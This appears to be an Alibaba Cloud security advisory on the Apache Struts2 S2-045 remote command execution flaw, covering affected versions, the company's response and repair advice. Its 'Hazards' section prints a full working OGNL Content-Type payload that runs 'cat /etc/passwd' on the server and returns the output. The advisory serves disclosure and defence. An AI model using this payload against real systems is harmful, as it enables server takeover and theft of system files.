Alibaba Cloud helps cloud users cope with Struts2 high-risk vulnerabilities

On March 6, 2017, a remote command execution vulnerability was found in Apache Struts2, with vulnerability number S2-045 and CVE number CVE-2017-5638. This vulnerability is officially rated as high-risk. When using file upload function based on Jakarta extension, malicious users can modify the Content-Type value in the HTTP request header to exploit the vulnerability, and then execute arbitrary system commands and hack the system.
After rating the vulnerability and confirming the scope of the impact, Alibaba Cloud Security Emergency team launched emergency measures immediately and analyzed the cause of the vulnerability, and then immediately issued the official security vulnerability warning.
Linkage response, zero security event
When the emergency measures are started, each department of Alibaba Cloud Security made responses to help users dealing with the Struts2 vulnerability. Alibaba Security Server Guard quickly detected the cloud ECS. Situation Awareness can accurately capture the IP address of attack sources using behavior detection functions. Web application firewall successfully upgraded protection rules on the next morning, which can help users effectively intercept attacks caused by the vulnerability.
Through timely detection, notification and rule upgrading, all Alibaba Cloud Security users were not affected by the vulnerability.
Vulnerability analysis
0×00 Vulnerability announcement
According to the official vulnerability announcement,
https://cwiki.apache.org/confluence/display/WW/S2-045
the main cause of the vulnerability is in the Content-Type.
It is possible to perform aRCE attack with a malicious Content-Type value. If the Content-Type value isn'tvalid an exception is thrown which is then used to display an error message toa users.
The remote command is executed by injecting the OGNL statement into the Content-Type of HTTP headers.
Struts2 encountered problems in handling exceptions.
0×01 Impact scope
Affected versions: Struts 2.3.5 - Struts 2.3.31, Struts 2.5 - Struts 2.5.10
0×02 Hazards
• Testing environment: Tomcat7, Struts2.3.16
• Testing procedures: intercept the requested packets on the uploading page
 
Add a key of Content-Type in the http header, and the value is our poc
%{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='cat  /etc/passwd').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=newjava.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}
 
Distribution of global attacks
 
Repair advice
• For the multipart parser that uploads files based on Jakarta, the detection method is to view the struts-core.x.x.jar under the web directory “/WEB-INF/lib/”. If this version is between Struts2.3.5 to Struts2.3.31 or Struts2.5 to Struts2.5.10, there are vulnerabilities. Please update to struts version 2.3.32 or 2.5.10.1.
• Multipart parsers that implement other methods to upload files.
• Use a third-party protective device for protection.
• Delete the commons-fileupload-x.x.x.jar file (which will disable the upload function).